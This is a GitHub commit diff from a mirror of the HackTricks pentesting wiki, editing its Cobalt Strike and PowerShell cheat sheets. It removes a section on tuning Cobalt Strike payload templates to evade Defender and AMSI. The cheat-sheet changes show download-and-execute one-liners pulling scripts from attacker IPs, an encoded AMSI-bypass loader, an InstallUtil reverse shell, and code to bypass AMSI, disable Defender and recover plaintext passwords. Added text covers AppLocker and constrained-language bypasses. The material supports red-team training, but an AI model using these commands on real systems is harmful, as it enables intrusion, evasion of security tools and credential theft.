mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [#3407] No subject
This commit is contained in:
parent
dc36b843f4
commit
a941c12d4f
3 changed files with 72 additions and 71 deletions
|
@ -171,33 +171,3 @@ beacon> socks 1080
|
|||
|
||||
# SSH connection
|
||||
beacon> ssh 10.10.17.12:22 username password</code></pre>
|
||||
|
||||
## Avoiding AVs
|
||||
|
||||
### Artifact Kit
|
||||
|
||||
Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons.
|
||||
|
||||
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
|
||||
|
||||
After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`.
|
||||
|
||||
```
|
||||
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
|
||||
```
|
||||
|
||||
Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded.
|
||||
|
||||
### Resource Kit
|
||||
|
||||
The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
|
||||
|
||||
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it:
|
||||
|
||||
```
|
||||
.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1
|
||||
```
|
||||
|
||||
Modifying the detected lines one can generate a template that won't be caught.
|
||||
|
||||
Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.
|
||||
|
|
|
@ -18,14 +18,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
## Default PowerShell locations
|
||||
|
||||
```
|
||||
```powershell
|
||||
C:\windows\syswow64\windowspowershell\v1.0\powershell
|
||||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
|
||||
```
|
||||
|
||||
## Basic PS commands to start
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
Get-Help * #List everything loaded
|
||||
Get-Help process #List everything containing "process"
|
||||
Get-Help Get-Item -Full #Get full helpabout a topic
|
||||
|
@ -36,7 +36,7 @@ Get-Command -Module <modulename>
|
|||
|
||||
## Download & Execute
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
|
||||
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
|
||||
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
|
||||
|
@ -48,13 +48,13 @@ $wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr
|
|||
|
||||
### Download & Execute in background with AMSI Bypass
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
|
||||
```
|
||||
|
||||
### Using b64 from linux
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
|
||||
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
|
||||
```
|
||||
|
@ -63,25 +63,25 @@ powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
|
|||
|
||||
### System.Net.WebClient
|
||||
|
||||
```
|
||||
```powershell
|
||||
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
|
||||
```
|
||||
|
||||
### Invoke-WebRequest
|
||||
|
||||
```
|
||||
```powershell
|
||||
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
|
||||
```
|
||||
|
||||
### Wget
|
||||
|
||||
```
|
||||
```powershell
|
||||
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
|
||||
```
|
||||
|
||||
### BitsTransfer
|
||||
|
||||
```
|
||||
```powershell
|
||||
Import-Module BitsTransfer
|
||||
Start-BitsTransfer -Source $url -Destination $output
|
||||
# OR
|
||||
|
@ -90,7 +90,7 @@ Start-BitsTransfer -Source $url -Destination $output -Asynchronous
|
|||
|
||||
## Base64 Kali & EncodedCommand
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
|
||||
PS> powershell -EncodedCommand <Base64>
|
||||
```
|
||||
|
@ -99,7 +99,7 @@ PS> powershell -EncodedCommand <Base64>
|
|||
|
||||
By default it is set to **restricted.** Main ways to bypass this policy:
|
||||
|
||||
```
|
||||
```powershell
|
||||
1º Just copy and paste inside the interactive PS console
|
||||
2º Read en Exec
|
||||
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
|
||||
|
@ -123,19 +123,19 @@ More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershel
|
|||
|
||||
## Constrained language
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
$ExecutionContext.SessionState.LanguageMode
|
||||
#Values could be: FullLanguage or ConstrainedLanguage
|
||||
```
|
||||
|
||||
### Bypass
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
#Easy bypass
|
||||
Powershell -version 2
|
||||
```
|
||||
|
||||
In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\\_\_31bf3856ad364e35\System.Management.Automation.dll\_ and **change the project to .Net4.5**.
|
||||
In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` and **change the project to .Net4.5**.
|
||||
|
||||
#### Direct bypass:
|
||||
|
||||
|
@ -149,11 +149,13 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
|
|||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
|
||||
```
|
||||
|
||||
You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
|
||||
|
||||
## AppLockerPolicy
|
||||
|
||||
Check which files/extensions are blacklisted/whitelisted.
|
||||
|
||||
```
|
||||
```powershell
|
||||
Get-ApplockerPolicy -Effective -xml
|
||||
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
|
||||
$a = Get-ApplockerPolicy -effective
|
||||
|
@ -162,7 +164,7 @@ $a.rulecollections
|
|||
|
||||
## Enable WinRM (Remote PS)
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
enable-psremoting -force #This enables winrm
|
||||
|
||||
# Change NetWorkConnection Category to Private
|
||||
|
@ -178,15 +180,32 @@ Get-NetConnectionProfile |
|
|||
|
||||
## Disable Defender
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
# Check status
|
||||
Get-MpComputerStatus
|
||||
Get-MpPreference | select Exclusion* | fl #Check exclusions
|
||||
# Disable
|
||||
Set-MpPreference -DisableRealtimeMonitoring $true
|
||||
#To completely disable Windows Defender on a computer, use the command:
|
||||
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
|
||||
# Set exclusion path
|
||||
Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
|
||||
Set-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
|
||||
|
||||
# Check exclusions configured via GPO
|
||||
Parse-PolFile .\Registry.pol
|
||||
|
||||
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
|
||||
ValueName : Exclusions_Paths
|
||||
ValueType : REG_DWORD
|
||||
ValueLength : 4
|
||||
ValueData : 1
|
||||
|
||||
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
|
||||
ValueName : C:\Windows\Temp
|
||||
ValueType : REG_SZ
|
||||
ValueLength : 4
|
||||
ValueData : 0
|
||||
```
|
||||
|
||||
### AMSI bypass
|
||||
|
@ -197,7 +216,7 @@ Therefore, the goal of the AMSI bypasses you will are are to **overwrite the ins
|
|||
|
||||
**AMSI bypass generator** web page: [**https://amsi.fail/**](https://amsi.fail/)****
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
# A Method
|
||||
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
||||
|
||||
|
@ -244,19 +263,19 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html
|
|||
|
||||
## PS-History
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
|
||||
```
|
||||
|
||||
## Get permissions
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
|
||||
```
|
||||
|
||||
## OS version and HotFixes
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
[System.Environment]::OSVersion.Version #Current OS version
|
||||
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
|
||||
Get-Hotfix -description "Security update" #List only "Security Update" patches
|
||||
|
@ -264,20 +283,20 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches
|
|||
|
||||
## Environment
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
Get-ChildItem Env: | ft Key,Value #get all values
|
||||
$env:UserName @Get UserName value
|
||||
```
|
||||
|
||||
## Other connected drives
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
|
||||
```
|
||||
|
||||
### Recycle Bin
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
$shell = New-Object -com shell.application
|
||||
$rb = $shell.Namespace(10)
|
||||
$rb.Items()
|
||||
|
@ -293,14 +312,14 @@ $rb.Items()
|
|||
|
||||
## Users
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
Get-LocalUser | ft Name,Enabled,Description,LastLogon
|
||||
Get-ChildItem C:\Users -Force | select Name
|
||||
```
|
||||
|
||||
## Secure String to Plaintext
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
|
||||
$user = "HTB\Tom"
|
||||
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
|
||||
|
@ -314,7 +333,7 @@ Domain : HTB
|
|||
|
||||
Or directly parsing form XML:
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
|
||||
|
||||
UserName : Tom
|
||||
|
@ -325,7 +344,7 @@ Domain : HTB
|
|||
|
||||
## SUDO
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
#CREATE A CREDENTIAL OBJECT
|
||||
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
|
||||
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
|
||||
|
@ -349,20 +368,20 @@ $computer = "<hostname>"
|
|||
|
||||
## Groups
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
Get-LocalGroup | ft Name #All groups
|
||||
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
|
||||
```
|
||||
|
||||
## Clipboard
|
||||
|
||||
```
|
||||
```powershell
|
||||
Get-Clipboard
|
||||
```
|
||||
|
||||
## Processes
|
||||
|
||||
```
|
||||
```powershell
|
||||
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
|
||||
```
|
||||
|
||||
|
@ -374,7 +393,7 @@ Get-Service
|
|||
|
||||
## Password from secure string
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
|
||||
$cred=new-object system.management.automation.pscredential("administrator", $pw)
|
||||
$cred.getnetworkcredential() | fl * #Get plaintext password
|
||||
|
@ -382,7 +401,7 @@ $cred.getnetworkcredential() | fl * #Get plaintext password
|
|||
|
||||
## Scheduled Tasks
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
||||
```
|
||||
|
||||
|
@ -390,14 +409,14 @@ Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,Tas
|
|||
|
||||
### Interfaces
|
||||
|
||||
```
|
||||
```powershell
|
||||
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
|
||||
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
|
||||
```
|
||||
|
||||
### Firewall
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
Get-NetFirewallRule -Enabled True
|
||||
|
||||
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
|
||||
|
@ -412,32 +431,32 @@ Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Tab
|
|||
|
||||
### Route
|
||||
|
||||
```
|
||||
```powershell
|
||||
route print
|
||||
```
|
||||
|
||||
### ARP
|
||||
|
||||
```
|
||||
```powershell
|
||||
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
|
||||
```
|
||||
|
||||
### Hosts
|
||||
|
||||
```
|
||||
```powershell
|
||||
Get-Content C:\WINDOWS\System32\drivers\etc\hosts
|
||||
```
|
||||
|
||||
### Ping
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
$ping = New-Object System.Net.Networkinformation.Ping
|
||||
1..254 | % { $ping.send("10.9.15.$_") | select address, status }
|
||||
```
|
||||
|
||||
### SNMP
|
||||
|
||||
```
|
||||
```powershell
|
||||
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
||||
```
|
||||
|
||||
|
|
|
@ -362,13 +362,17 @@ Get-MpComputerStatus
|
|||
|
||||
Check which files/extensions are blacklisted/whitelisted.
|
||||
|
||||
```
|
||||
```powershell
|
||||
Get-ApplockerPolicy -Effective -xml
|
||||
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
|
||||
$a = Get-ApplockerPolicy -effective
|
||||
$a.rulecollections
|
||||
```
|
||||
|
||||
AppLocker rules applied to a host can also be read from the local registry at `HKLM\Software\Policies\Microsoft\Windows\SrpV2`.
|
||||
|
||||
|
||||
|
||||
**Useful Writable folders to bypass AppLocker Policy**
|
||||
|
||||
```
|
||||
|
@ -378,6 +382,14 @@ C:\Windows\Tasks
|
|||
C:\windows\tracing
|
||||
```
|
||||
|
||||
Commonly trusted [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker.
|
||||
|
||||
**Poorly written rules could also be bypassed**, like `<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`, you can create a folder called allowed anywhere and it will be allowed.
|
||||
|
||||
**DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using DLLs as backdoors will help bypassing AppLocker.
|
||||
|
||||
You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
|
||||
|
||||
### UAC
|
||||
|
||||
UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user.\
|
||||
|
|
Loading…
Reference in a new issue